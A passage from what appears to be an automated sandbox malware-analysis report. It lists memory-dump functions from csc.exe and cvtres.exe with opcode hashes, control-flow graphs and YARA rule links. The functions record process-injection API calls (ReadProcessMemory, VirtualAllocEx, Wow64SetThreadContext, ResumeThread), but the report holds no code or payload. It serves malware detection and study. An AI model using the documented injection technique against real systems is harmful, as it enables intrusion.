                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 199087510ffc69137006025c070fcf4c10c7a4ad5b1bbe189e0503b5f3750aa8
                                    • Instruction ID: 599a1a9ebd3e68783824e712a84d31563ad92e56fcf0590d88899a05962df118
                                    • Opcode Fuzzy Hash: 199087510ffc69137006025c070fcf4c10c7a4ad5b1bbe189e0503b5f3750aa8
                                    • Instruction Fuzzy Hash: 21212475C003499FDB10DFAAC884BEEBBF5FF48310F54842AE959A3240D7799940CBA4
                                    Function 05822858 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 581 5822858-58228a3 584 58228b3-58228e3 Wow64SetThreadContext 581->584 585 58228a5-58228b1 581->585 587 58228e5-58228eb 584->587 588 58228ec-582291c 584->588 585->584 587->588
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058228D6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 1d95b7a752c7f66db9bf25948d61ad0cb088d0af15325f92edb60d8de1c57b8b
                                    • Instruction ID: e7f065bc2f50b0f821c9ab8ca8a72b37ea03a8c4640d81b4da13c4301f0d053d
                                    • Opcode Fuzzy Hash: 1d95b7a752c7f66db9bf25948d61ad0cb088d0af15325f92edb60d8de1c57b8b
                                    • Instruction Fuzzy Hash: 22213875D003098FDB10DFAAC485BEEBBF4EF48310F548429D919A7640CB789945CFA4
                                    Function 05822AE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 592 5822ae0-5822b6d ReadProcessMemory 595 5822b76-5822ba6 592->595 596 5822b6f-5822b75 592->596 596->595
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05822B60
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: d6d860d7eb912f4a816c1161e1771cba1f7b62bac652631397998dc7963f1866
                                    • Instruction ID: 4f322ec3b40559051098719d30601c8aedd35aaa674b663df79aaee15158437a
                                    • Opcode Fuzzy Hash: d6d860d7eb912f4a816c1161e1771cba1f7b62bac652631397998dc7963f1866
                                    • Instruction Fuzzy Hash: 89212575C003599FDB10DFAAC881BEEBBF5FF48310F50842AE919A7240C7799941CBA4
                                    Function 05822928 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 600 5822928-58229ab VirtualAllocEx 603 58229b4-58229d9 600->603 604 58229ad-58229b3 600->604 604->603
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0582299E
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 7037c3d84997ecfd0616c87a0eb62c08f3cbc1407f34291ee0fdfb498d891cd4
                                    • Instruction ID: d85745670201c0b977255cf79b26363faeec057b668598c68ff15f840c81a51c
                                    • Opcode Fuzzy Hash: 7037c3d84997ecfd0616c87a0eb62c08f3cbc1407f34291ee0fdfb498d891cd4
                                    • Instruction Fuzzy Hash: CF1164758003499FDB20DFAAC840BEEBFF1AF88324F548819E956A7240C7369951CBA0
                                    Function 05822930 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0582299E
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 82162c3c996651ada8b39e40dc15a556e69fb2e681bd95f7d896a6428571ed4a
                                    • Instruction ID: 899d0515d5dc109e781d6b92398abefb9f07edb7330e7d2347cc632c6586c996
                                    • Opcode Fuzzy Hash: 82162c3c996651ada8b39e40dc15a556e69fb2e681bd95f7d896a6428571ed4a
                                    • Instruction Fuzzy Hash: EE1114758003499FDB20DFAAC845BDEBBF5AB88324F148419E915A7250CB759940CBA0
                                    Function 05821A31 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 6f7f1a1cd050fa635defeb16286e92149f111913783dcd9c3a99b7082df97253
                                    • Instruction ID: 5950db874839adf36d2907b30751d56cd39875232e95ee8c3af670a9d3c09817
                                    • Opcode Fuzzy Hash: 6f7f1a1cd050fa635defeb16286e92149f111913783dcd9c3a99b7082df97253
                                    • Instruction Fuzzy Hash: 9F1188B1D003488FDB20DFAAC445BEEFFF4AF88320F248419D919A7240CB75A941CB94
                                    Function 05821A38 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: e0a478ca10752dcb7925aefe94a894980ea7ac73c56ba1d7dd5c6b6319c945d2
                                    • Instruction ID: 0c331171a0d3920ec85ec97f4b7f7a18ba4df0ce4f5ad5b61f3ab622758fe10e
                                    • Opcode Fuzzy Hash: e0a478ca10752dcb7925aefe94a894980ea7ac73c56ba1d7dd5c6b6319c945d2
                                    • Instruction Fuzzy Hash: 51112875D003498FDB20DFAAC445BDEFBF5AB48324F248419D519A7240CB756945CB94
                                    Function 05821AD8 Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 0a7f807c2eee09b85208eab72547774a0bacb105a9115f257614101d001e3769
                                    • Instruction ID: 76d97cdd492e4d4c6911d18de9527753c07ae6f3f78afbe743b19d945e4b8f90
                                    • Opcode Fuzzy Hash: 0a7f807c2eee09b85208eab72547774a0bacb105a9115f257614101d001e3769
                                    • Instruction Fuzzy Hash: F2F08473A083908FE7209769C8183E9BFF0EF92320F24808AC49FCB560D2399886C751

                                    Executed Functions

                                    Function 0125D01C Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a1998f90c64352c7f85b716ddd9e6b9586c4aaf1318dbf32530b2b0d599778d7
                                    • Instruction ID: 1645b7e086e428b6525917335697830af7a68dddf00dcdf747b4f77a90519bc8
                                    • Opcode Fuzzy Hash: a1998f90c64352c7f85b716ddd9e6b9586c4aaf1318dbf32530b2b0d599778d7
                                    • Instruction Fuzzy Hash: B1212371624308DFDB61DF54D9C4B26BB65FB84364F20C569ED490B342C37AD44BCAA2
                                    Function 0125D1CC Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7350bac7b972eb764e157d6d5a347e089619cd5449d42b214ee64f36f908ce82
                                    • Instruction ID: 61510ece4b272e0e0bd092fbc95192ba643bfda4bbdd23a86c10f276629b35ec
                                    • Opcode Fuzzy Hash: 7350bac7b972eb764e157d6d5a347e089619cd5449d42b214ee64f36f908ce82
                                    • Instruction Fuzzy Hash: 382122B5A14308DFDB45DF94D9C0B16BB61FB84324F20C56DDD098B287C776D846CA62
                                    Function 0125D006 Relevance: .1, Instructions: 60COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 162b121a473dab6e416c293d5c92dd64702b345b5c524d1d25d196d128461c53
                                    • Instruction ID: 628b7501aa82eaea5ccf37ee480222e3688d6d0915b3f65b352c7e23c4d087b8
                                    • Opcode Fuzzy Hash: 162b121a473dab6e416c293d5c92dd64702b345b5c524d1d25d196d128461c53
                                    • Instruction Fuzzy Hash: C521AE765093848FDB13CF24D9D0715BF71EB85324F28C5EAD9488B693C33A940ACB62
                                    Function 0125D1C7 Relevance: .1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2506142182.000000000125D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0125D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_125d000_cvtres.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction ID: 1095fb20f6a05e2acaee0f50624a8f06fcaa47e7774ca4e8a9b7a573f901177d
                                    • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                    • Instruction Fuzzy Hash: A011BB79504284DFDB06CF54D5C0B15BBA2FB84324F24C6ADDD498B297C33AD84ACB61